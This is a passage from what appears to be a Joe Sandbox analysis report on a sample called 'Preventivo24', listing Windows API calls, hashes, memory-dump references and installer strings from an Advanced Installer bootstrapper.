                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiNamePathShortWide
                                                                              • String ID:
                                                                              • API String ID: 3379522384-0
                                                                              • Opcode ID: 5e5b9f93d043ce955ced591f339f690d3be98f47fb1569d2dfbcbf28c91f2ea5
                                                                              • Instruction ID: 4ce0199dc57080ec6a88a5b21a71b6945ef110b199e961cc0818dc1225c417e6
                                                                              • Opcode Fuzzy Hash: 5e5b9f93d043ce955ced591f339f690d3be98f47fb1569d2dfbcbf28c91f2ea5
                                                                              • Instruction Fuzzy Hash: 67517C71A042059FDB14DFA8DD89B6EF7A6FF44324F14462AE925EB390DB35AC00CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(000000A3,80000000,00000003,00000000,00000003,00000080,00000000,B5580983,00000000,Function_00028630), ref: 0100505A
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0100508B
                                                                              • ReadFile.KERNEL32(?,00000000,00010000,?,00000000,00010000), ref: 0100511B
                                                                              • CloseHandle.KERNEL32(00000000), ref: 010051E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                              • String ID:
                                                                              • API String ID: 3919263394-0
                                                                              • Opcode ID: c35ec07505ce0a09461d72458568325b227807672d2249afea6cfb34c833a845
                                                                              • Instruction ID: 539fd1cfbc4f699f6dbc24f91a875e9e406ff2a3385645aeb45dadf3541ea3f4
                                                                              • Opcode Fuzzy Hash: c35ec07505ce0a09461d72458568325b227807672d2249afea6cfb34c833a845
                                                                              • Instruction Fuzzy Hash: 0E51F171900218AFFB21CF68CC84BDDBBB8EF11314F104199E599A72C1DB701A85CF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00F4BCBB
                                                                              • GetWindowRect.USER32(?,?), ref: 00F4BCD3
                                                                              • GetWindowRect.USER32(?,?), ref: 00F4BD40
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00F4BD64
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$Long
                                                                              • String ID:
                                                                              • API String ID: 3486571012-0
                                                                              • Opcode ID: 9866afff7e51ca06fe369d6388edea07d08119aaa2dc74dfe73ec2db537020e8
                                                                              • Instruction ID: 6ff9fd617163899c07137a67c19e92260c0d9760dec86fe7f870cac9184958da
                                                                              • Opcode Fuzzy Hash: 9866afff7e51ca06fe369d6388edea07d08119aaa2dc74dfe73ec2db537020e8
                                                                              • Instruction Fuzzy Hash: 8C41BE32A093059FC314CF15D884A6BBBF8FF99714F04462EF99997255EB30E981CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetWindowLongW.USER32(?,000000FC,00000000), ref: 00EA3006
                                                                              • GetParent.USER32(?), ref: 00EA303A
                                                                                • Part of subcall function 0108A23A: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00FEBA31,?,?,?), ref: 0108A23F
                                                                                • Part of subcall function 0108A23A: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 0108A246
                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00EA307B
                                                                              • ShowWindow.USER32(?,00000000), ref: 00EA309D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Window$HeapLong$AllocParentProcessShow
                                                                              • String ID:
                                                                              • API String ID: 78937335-0
                                                                              • Opcode ID: f4f787b05d35b4c7012d6ce9c0650cf0b86e7dccb21e45c7ce0f124b7893a768
                                                                              • Instruction ID: af8ff62faed48bad51b73be5636cfee79cdd6c9cb56c8291fdd10cffdd4d6de0
                                                                              • Opcode Fuzzy Hash: f4f787b05d35b4c7012d6ce9c0650cf0b86e7dccb21e45c7ce0f124b7893a768
                                                                              • Instruction Fuzzy Hash: 5831E1316082149FCB14AF28D884A2BBBE8FF5D214B0441AAFC15EB396DB30ED41CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 010882CB
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 010882D6
                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 01088344
                                                                                • Part of subcall function 01088427: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0108843F
                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 010882F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                              • String ID:
                                                                              • API String ID: 677527491-0
                                                                              • Opcode ID: ce5347e63c56705d258cb44375cb6de5c3eeeb83f65273c42f2dd9320e6488cf
                                                                              • Instruction ID: ab1fb1fb95004d375f1600b704cb26aa629eb0ca706618b49c0943da3adca773
                                                                              • Opcode Fuzzy Hash: ce5347e63c56705d258cb44375cb6de5c3eeeb83f65273c42f2dd9320e6488cf
                                                                              • Instruction Fuzzy Hash: EB01DF366056228FC70AFF20D944ABDBBB2FFA4300B548019E8A157384DF74AA42CBC5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00E90FF0
                                                                                • Part of subcall function 010880CC: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,00E91006,?,00000000,00000000), ref: 010880D8
                                                                                • Part of subcall function 010880CC: GetExitCodeThread.KERNEL32(?,00000000,?,?,?,00E91006,?,00000000,00000000), ref: 010880F1
                                                                                • Part of subcall function 010880CC: CloseHandle.KERNEL32(?,?,?,?,00E91006,?,00000000,00000000), ref: 01088103
                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00E91019
                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00E91020
                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00E91027
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Cpp_errorThrow_std::_$Thread$CloseCodeCurrentExitHandleObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 2210105531-0
                                                                              • Opcode ID: 1ed3cb3a0ecf168414361c9adb4cb5cf89df12003af28a51cee2dff6013e6b98
                                                                              • Instruction ID: b186d74bff8ff5b842d98fdbabecd70e0a7f78a9943d1c2eb19efd79ee467523
                                                                              • Opcode Fuzzy Hash: 1ed3cb3a0ecf168414361c9adb4cb5cf89df12003af28a51cee2dff6013e6b98
                                                                              • Instruction Fuzzy Hash: 67F0E2304047079EDB307AA48D0579272D89B20705F40CA6EA6E8564C0FAB2A4518B92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 00FB82D6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ___std_exception_copy
                                                                              • String ID: ios_base::failbit set$iostream
                                                                              • API String ID: 2659868963-302468714
                                                                              • Opcode ID: 25196e1ea7a6e0fea5930ca84180e7e4894bef715015316d82775148e6c7fe89
                                                                              • Instruction ID: b5c0147520167987b554258792a69a96d41b229ae75b3a56dc1a05e77c3f73cd
                                                                              • Opcode Fuzzy Hash: 25196e1ea7a6e0fea5930ca84180e7e4894bef715015316d82775148e6c7fe89
                                                                              • Instruction Fuzzy Hash: A4C168B1D04248DFDB14DFA9C844BAEFBB4FF48314F24821AE864AB281DB745A45DF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,AtlAxWin140,?,?,?,80000000,00000000,00000000,?,00000000,00000000), ref: 00E96772
                                                                              • SendMessageW.USER32(00000008,00000000,00000000,00000000), ref: 00E96861
                                                                                • Part of subcall function 00E98520: SysFreeString.OLEAUT32(00000000), ref: 00E985E0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFreeMessageSendStringWindow
                                                                              • String ID: AtlAxWin140
                                                                              • API String ID: 4045344427-3842940177
                                                                              • Opcode ID: 522df428720cfdee456f20be768ee1f1166cb6ae942c3ac0b4b5f3958fa31366
                                                                              • Instruction ID: 0fe2c304fb9561a5d6b3a67cd260ab40eac94faf3d7dc122fd9d6c34e8d822ea
                                                                              • Opcode Fuzzy Hash: 522df428720cfdee456f20be768ee1f1166cb6ae942c3ac0b4b5f3958fa31366
                                                                              • Instruction Fuzzy Hash: 3CA17C75A10219DFCB18DF58C984B6EBBBAFF48714F1441AAE815AB395CB70AD01CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AddressAllocateFolderHeapLibraryLoadLocationProcSpecial
                                                                              • String ID: ADVINST_LOGS$Everyone
                                                                              • API String ID: 1617241543-3921853867
                                                                              • Opcode ID: f30c82fc6ac7e775455bea00a4102381d7ccac3af6b473e655fe5626f0e17038
                                                                              • Instruction ID: cfa08cc5723f48a1589563b9f4c79ec65851ed55cb122c96550c2aa315c4c09a
                                                                              • Opcode Fuzzy Hash: f30c82fc6ac7e775455bea00a4102381d7ccac3af6b473e655fe5626f0e17038
                                                                              • Instruction Fuzzy Hash: B2A1FF72D05209CFDB14EF68C949BAEF7B1AF04324F284158E911BB3A1DB356E05DBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveWindow
                                                                              • String ID: User accepted to install a newer version.$User refused to install a newer version.
                                                                              • API String ID: 2558294473-4113633398
                                                                              • Opcode ID: bd312194c40ffb2e179e9fb3a4b5db5bae3217a3220de485a2a1a37f93a4453d
                                                                              • Instruction ID: 0f7548c2d41ffdc40b71eb0c98330c17cd21d88481758b427ab878f6dd1e9ca8
                                                                              • Opcode Fuzzy Hash: bd312194c40ffb2e179e9fb3a4b5db5bae3217a3220de485a2a1a37f93a4453d
                                                                              • Instruction Fuzzy Hash: 4F811331E006099FCB14DB68C85576EF7F1EF88324F18816CE919A7392DB35AD06CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,010FA26F,000000FF), ref: 00FF630B
                                                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,010FA26F,000000FF), ref: 00FF63C4
                                                                              Strings
                                                                              • << Advanced Installer (x86) Log >>, xrefs: 00FF6263
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCriticalDeleteHandleHeapProcessSection
                                                                              • String ID: << Advanced Installer (x86) Log >>
                                                                              • API String ID: 1977327082-396061572
                                                                              • Opcode ID: 76a27b91738cb5aac3a77e7fd92d76b8a06e402e6df89eaca3f693ac77a9adfd
                                                                              • Instruction ID: b013f35b6f6cde5f2e6ec8ef0aadee8539065eac10593923c9cb19d8f52b8c33
                                                                              • Opcode Fuzzy Hash: 76a27b91738cb5aac3a77e7fd92d76b8a06e402e6df89eaca3f693ac77a9adfd
                                                                              • Instruction Fuzzy Hash: EC71E030A05248DFCB19DF68C55476EBBF5FF48314F24826DE824A7382DB759A46CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PathIsUNCW.SHLWAPI(?,B5580983,00000000,?,?,?,00FD877E,00000000), ref: 00FE8F68
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Path
                                                                              • String ID: Extraction path set to:$\\?\
                                                                              • API String ID: 2875597873-2975605734
                                                                              • Opcode ID: 1febb85b8f3ee343b19513164abe25db2dc6cdbacc5c68fa851e023f7e976769
                                                                              • Instruction ID: 8c615cdda16e5b7fa0e83ad95d1e461bca4f7285b98f1371f7839dead21e6ff0
                                                                              • Opcode Fuzzy Hash: 1febb85b8f3ee343b19513164abe25db2dc6cdbacc5c68fa851e023f7e976769
                                                                              • Instruction Fuzzy Hash: 49611731A00659DFCB18DF68C844BAEF7B1FF44320F544259E929A7391DB35AD06CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PathIsUNCW.SHLWAPI(?,B5580983), ref: 00FAE2B2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
